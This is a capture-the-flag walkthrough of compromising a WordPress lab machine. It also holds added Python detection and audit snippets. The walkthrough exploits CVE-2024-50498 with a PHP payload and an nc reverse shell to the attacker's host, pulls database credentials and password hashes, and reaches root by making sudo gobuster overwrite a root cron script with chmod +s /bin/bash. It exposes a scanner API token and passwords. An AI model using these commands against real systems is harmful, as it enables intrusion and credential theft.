50.buster

1. Basic information

2. Reconnaissance

2.1. Port scan

┌──(root㉿kali)-[~/Desktop/hmv/buster]
└─# nmap -sCV 192.168.0.112
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-01 03:32 EST
Nmap scan report for 192.168.0.112
Host is up (0.00038s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey:
|   2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
|   256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_  256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: bammmmuwe
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 6.7.1
MAC Address: 08:00:27:5B:50:A1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.45 seconds

A WordPress site is running on port 80.

2.2. Vulnerability scan

There is a pitfall here: wpscan only finds the plugin when run with --plugins-detection aggressive, and aggressive mode is normally skipped to save time.

┌──(root㉿kali)-[~/Desktop/hmv/buster]
└─# wpscan --url 192.168.0.112 --api-token NFNsfH98jCn9HY8bE9Xx6Z0opt1X9W15bqjgoMnpfFE -e u,ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.112/ [192.168.0.112]
[+] Started: Sat Feb  1 04:43:52 2025


...

[+] wp-query-console
 | Location: http://192.168.0.112/wp-content/plugins/wp-query-console/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2018-03-16T16:03:00.000Z
 | Readme: http://192.168.0.112/wp-content/plugins/wp-query-console/README.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.0.112/wp-content/plugins/wp-query-console/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
 |     References:
 |      - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.0.112/wp-content/plugins/wp-query-console/README.txt

The site has the wp-query-console plugin installed, and that plugin has an unauthenticated RCE, CVE-2024-50498.

nuclei can also be used here; it picks it up right away.

┌──(root㉿kali)-[~]
└─# nuclei -u 192.168.0.112

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.8

                projectdiscovery.io

[WRN] Found 2 templates with runtime error (use -validate flag for further examination)
[INF] Current nuclei version: v3.3.8 (latest)
[INF] Current nuclei-templates version: v10.1.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 52
[INF] Templates loaded for current scan: 7654
[INF] Executing 7274 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 380 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Templates clustered: 1693 (Reduced 1591 Requests)
[INF] Using Interactsh Server: oast.pro
[CVE-2024-50498] [http] [critical] http://192.168.0.112/index.php?rest_route=/wqc/v1/query
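Both scanners point at the plugin's REST route, which is also what a defender should be watching for in the web server logs. The following is an added example (not part of the original walkthrough): it parses nginx combined-format access lines and flags requests to the wqc/v1/query route in either the /wp-json/ form or the ?rest_route= form that nuclei reported. The log lines are constructed samples.

```python
"""Flag requests to the WP Query Console REST route in nginx access logs."""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# nginx "combined" log format: ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "agent"
_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Route registered by the plugin; reachable as /wp-json/wqc/v1/query or via ?rest_route=.
WQC_ROUTE = "/wqc/v1/query"

def rest_route(target: str) -> Optional[str]:
    """Resolve the WordPress REST route from a request target, covering both
    pretty permalinks (/wp-json/<route>) and the ?rest_route=<route> form."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    if path.startswith("/wp-json/"):
        return "/" + path[len("/wp-json/"):]
    qs = parse_qs(parts.query)
    if "rest_route" in qs:
        return unquote(qs["rest_route"][0])
    return None

def find_wqc_requests(log_text: str) -> list:
    """Return one record per request that targets the WQC query endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        route = rest_route(m["target"])
        if route and route.rstrip("/") == WQC_ROUTE:
            hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "status": int(m["status"]), "route": route})
    return hits

# Constructed sample lines (not taken from the target); the second uses the
# percent-encoded rest_route form that nuclei reported.
SAMPLE_LOG = """\
192.168.0.114 - - [01/Feb/2025:19:57:23 -0500] "POST /wp-json/wqc/v1/query HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.0.114 - - [01/Feb/2025:19:58:01 -0500] "GET /index.php?rest_route=%2Fwqc%2Fv1%2Fquery HTTP/1.1" 200 612 "-" "curl/8.5.0"
192.168.0.50 - - [01/Feb/2025:19:58:30 -0500] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 4012 "-" "Mozilla/5.0"
192.168.0.50 - - [01/Feb/2025:19:59:00 -0500] "GET /robots.txt HTTP/1.1" 200 67 "-" "Mozilla/5.0"
"""
```

Running find_wqc_requests(SAMPLE_LOG) returns the two requests from 192.168.0.114 and ignores the ordinary wp/v2 and robots.txt traffic; any hit on a site that has no business exposing this plugin is worth an alert.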

2.3. Exploiting CVE-2024-50498

POST /wp-json/wqc/v1/query HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-query-console
Content-Type: application/json
Content-Length: 45 
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0

{"queryArgs":"phpinfo();","queryType":"post"}

Trying to pop a shell failed.
Looking at phpinfo() shows that the system function is disabled.
We can simply use the shell_exec() function to run commands instead.

shell_exec('nc -e /bin/bash 192.168.0.114 2233');

We successfully get a shell.

┌──(root㉿kali)-[~/Desktop/hmv/buster]
└─# pwncat-cs -lp 2233
[06:54:55] Welcome to pwncat 🐈!                                                                  __main__.py:164
[07:02:08] received connection from 192.168.0.112:36100                                                bind.py:84
[07:02:09] 192.168.0.112:36100: registered new host w/ db                                          manager.py:957
(local) pwncat$
(remote) www-data@listen:/var/www/html/wordpress$
(remote) www-data@listen:/var/www/html/wordpress$ whoami
www-data
(remote) www-data@listen:/var/www/html/wordpress$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
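The reason the shell came back is that disable_functions on the target blocked system() but not shell_exec(), so the restriction was only cosmetic. The following is an added example (not from the original walkthrough): a small audit that parses a php.ini disable_functions directive and lists which exec-family functions are still callable. The php.ini fragments are constructed samples, not the target's real configuration.

```python
"""Audit a php.ini disable_functions directive for gaps in command-execution coverage."""
import re

# Functions that hand a string to a shell or spawn a process. Disabling only
# some of them (the target blocked system() but left shell_exec() callable)
# gives no real protection, since any one of them is enough.
EXEC_FAMILY = {"exec", "passthru", "shell_exec", "system",
               "proc_open", "popen", "pcntl_exec"}

_DISABLE_RE = re.compile(r"^\s*disable_functions\s*=\s*(.*?)\s*$", re.M)

def parse_disable_functions(ini_text: str) -> set:
    """Set of function names disabled by the php.ini text (last directive wins)."""
    matches = _DISABLE_RE.findall(ini_text)
    if not matches:
        return set()
    raw = matches[-1].strip().strip('"').strip("'")
    return {name.strip().lower() for name in raw.split(",") if name.strip()}

def missing_exec_functions(ini_text: str) -> list:
    """Exec-family functions that remain callable under this php.ini."""
    return sorted(EXEC_FAMILY - parse_disable_functions(ini_text))

# Constructed php.ini fragments: the partial configuration the target
# effectively had, and a hardened one that closes the shell_exec() gap.
WEAK_INI = """
; constructed sample, not the target's real php.ini
expose_php = Off
disable_functions = system,exec
"""

HARDENED_INI = """
; constructed sample
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
"""

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        gaps = missing_exec_functions(ini)
        print(f"{label}: {'all exec functions disabled' if not gaps else 'still callable: ' + ', '.join(gaps)}")
```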

3. Privilege escalation to the welcome user

3.1. Using the database

First look at the wp-config.php configuration file, which contains the database username and password.

(remote) www-data@listen:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'll104567' );

/** Database password */
define( 'DB_PASSWORD', 'thehandsomeguy' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

Use those credentials to pull sensitive information from the database.

(remote) www-data@listen:/home$ mysql -ull104567 -pthehandsomeguy
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 129466
Server version: 10.3.39-MariaDB-0+deb10u2 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> showdatabse;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'showdatabse' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.000 sec)

MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.000 sec)

MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url              | user_registered     | user_activation_key                           | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
|  1 | ta0        | $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. | ta0           | 2814928906@qq.com | http://192.168.31.181 | 2025-01-08 03:10:43 |                                               |           0 | ta0          |
|  2 | welcome    | $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ | welcome       | 127.0.0.1@qq.com  |                       | 2025-01-08 04:29:28 | 1736310568:$P$B2YbhlDVF1XWIurbL11Pfoasb./0tD. |           0 | welcome      |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.000 sec)

3.2. Hash cracking

We now have the hashes of two users:

ta0 $P$BDDc71nM67DbOVN/U50WFGII6EF6.r.
welcome  $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/

Cracking with rockyou recovers the welcome user's password: 104567

Log in with that password and grab the user flag.

welcome@listen:~$ cat user.txt
29e0f786e8c90b3ce82e00de0ec7e7d3

4. Privilege escalation from welcome to root

4.1. Escalation via gobuster

$ sudo -l
Matching Defaults entries for welcome on listen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on listen:
    (ALL) NOPASSWD: /usr/bin/gobuster

The current user can run gobuster as root.

With pspy64 we find a scheduled task on the target, /opt/.test.sh, that runs as root.
The idea is to use gobuster's file output to overwrite that scheduled task.

This requires some familiarity with gobuster's options.
We mainly rely on the -o flag to write output and replace the scheduled task,
so the first job is to construct the payload that gets written.

When gobuster finds valid results, -o writes them to the specified file.
For example:

welcome@listen:/tmp$ echo 'pspy64' >dir.txt

welcome@listen:/tmp$ gobuster  -w dir.txt -u 192.168.0.114 -o result.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.0.114/
[+] Threads      : 10
[+] Wordlist     : dir.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2025/02/02 06:35:49 Starting gobuster
=====================================================
/pspy64 (Status: 200)
=====================================================
2025/02/02 06:35:49 Finished
=====================================================
welcome@listen:/tmp$ cat result.txt
/pspy64 (Status: 200)

As shown above, I put pspy64 in the wordlist, scanned my Kali box 192.168.0.114, and wrote the results to result.txt; looking at result.txt, it contains /pspy64 (Status: 200).

So we only need to find a way to turn /pspy64 (Status: 200) into our payload and then overwrite the scheduled task with it.

Note that the (Status: 200) part of /pspy64 (Status: 200) is not wanted in the result;
adding the -n flag takes care of that.

Then write the payload chmod +s /bin/bash into dir.txt.

On the target:
echo 'bin/chmod +s /bin/bash' >dir.txt

After writing it, the entry still has to be found by the scan, so create the matching path on the host being scanned.

On the host being scanned:
┌──(root㉿kali)-[/var/www/html]
└─# mkdir bin

┌──(root㉿kali)-[/var/www/html]
└─# cd bin

┌──(root㉿kali)-[/var/www/html/bin]
└─# mkdir "chmod +s "

┌──(root㉿kali)-[/var/www/html/bin]
└─# cd chmod\ +s\

┌──(root㉿kali)-[/var/www/html/bin/chmod +s ]
└─# mkdir bin

┌──(root㉿kali)-[/var/www/html/bin/chmod +s ]
└─# cd bin

┌──(root㉿kali)-[/var/…/html/bin/chmod +s /bin]
└─# touch bash

A bin directory has to be created first rather than a chmod directory directly,
because gobuster prefixes its output with /, which would make the final payload /chmod +s /bin/bash and it would not execute.
So the payload is built with the absolute path /bin/chmod +s /bin/bash.

Then go back to the target, run gobuster, and overwrite the scheduled task:

welcome@listen:/tmp$ sudo gobuster  -w dir.txt -u 192.168.0.114 -o /opt/.test.sh -n

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.0.114/
[+] Threads      : 10
[+] Wordlist     : dir.txt
[+] Status codes : 200,204,301,302,307,403
[+] No status    : true
[+] Timeout      : 10s
=====================================================
2025/02/02 07:01:39 Starting gobuster
=====================================================
/bin/chmod +s /bin/bash
=====================================================
2025/02/02 07:01:39 Finished
=====================================================

Wait a moment and we have root.

welcome@listen:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
welcome@listen:/tmp$ /bin/bash -p
bash-5.0# id
uid=1001(welcome) gid=1001(welcome) euid=0(root) egid=0(root) groups=0(root),1001(welcome)
bash-5.0# cd /root
bash-5.0# ls
note.txt  R00t_fl4g_is_HHHHerererererrererere.txt
bash-5.0# cat R00t_fl4g_is_HHHHerererererrererere.txt
b6a1a0de4223ba038327fc9c647701fb
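The whole chain rests on a sudo rule that lets a scanner with a free-form -o flag run as root, and sudo logs every such invocation with its full command line. The following is an added example (not part of the original walkthrough): it scans sudo's syslog lines and flags root gobuster runs whose output file lands outside a scratch directory, which is exactly how /opt/.test.sh was overwritten. The log lines and the allowed-prefix list are constructed assumptions.

```python
"""Flag sudo-as-root gobuster runs whose -o output path falls outside a scratch directory."""
import re
import shlex
from typing import Optional

# sudo's syslog line (auth.log / journal); the samples below are constructed to
# mirror the walkthrough's final step:
#   Feb  2 07:01:39 listen sudo:  welcome : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/gobuster ...
_SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) sudo:\s+(?P<user>\S+) : "
    r".*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# Where a wordlist scan may legitimately write (assumed policy). Anything else,
# cron scripts included, is the file-write primitive the walkthrough abused.
# Relative paths are flagged too, since PWD is not resolved here.
ALLOWED_OUTPUT_PREFIXES = ("/tmp/", "/home/")

def output_path(argv: list) -> Optional[str]:
    """Return the file given to gobuster's -o / --output flag, if any."""
    for i, arg in enumerate(argv):
        if arg in ("-o", "--output") and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("--output="):
            return arg.split("=", 1)[1]
    return None

def suspicious_gobuster_runs(log_text: str) -> list:
    """Records for root gobuster runs that write outside ALLOWED_OUTPUT_PREFIXES."""
    hits = []
    for line in log_text.splitlines():
        m = _SUDO_RE.match(line)
        if not m or m["runas"] != "root":
            continue
        argv = shlex.split(m["cmd"])
        if not argv or not argv[0].endswith("/gobuster"):
            continue
        out = output_path(argv)
        if out and not out.startswith(ALLOWED_OUTPUT_PREFIXES):
            hits.append({"ts": m["ts"], "user": m["user"], "output": out, "cmd": m["cmd"]})
    return hits

# Constructed sample log: a scan writing into /tmp, the overwrite of the root
# cron script from the walkthrough, and a run with no -o at all.
SAMPLE_AUTH_LOG = """\
Feb  2 06:35:49 listen sudo:  welcome : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/gobuster -w dir.txt -u 192.168.0.114 -o /tmp/result.txt
Feb  2 07:01:39 listen sudo:  welcome : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/gobuster -w dir.txt -u 192.168.0.114 -o /opt/.test.sh -n
Feb  2 07:05:12 listen sudo:  welcome : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/gobuster -w dir.txt -u 192.168.0.114
"""
```

suspicious_gobuster_runs(SAMPLE_AUTH_LOG) returns only the 07:01:39 entry writing to /opt/.test.sh; the real fix is to drop the NOPASSWD rule for a tool that can write arbitrary files, since no log rule makes that sudo entry safe.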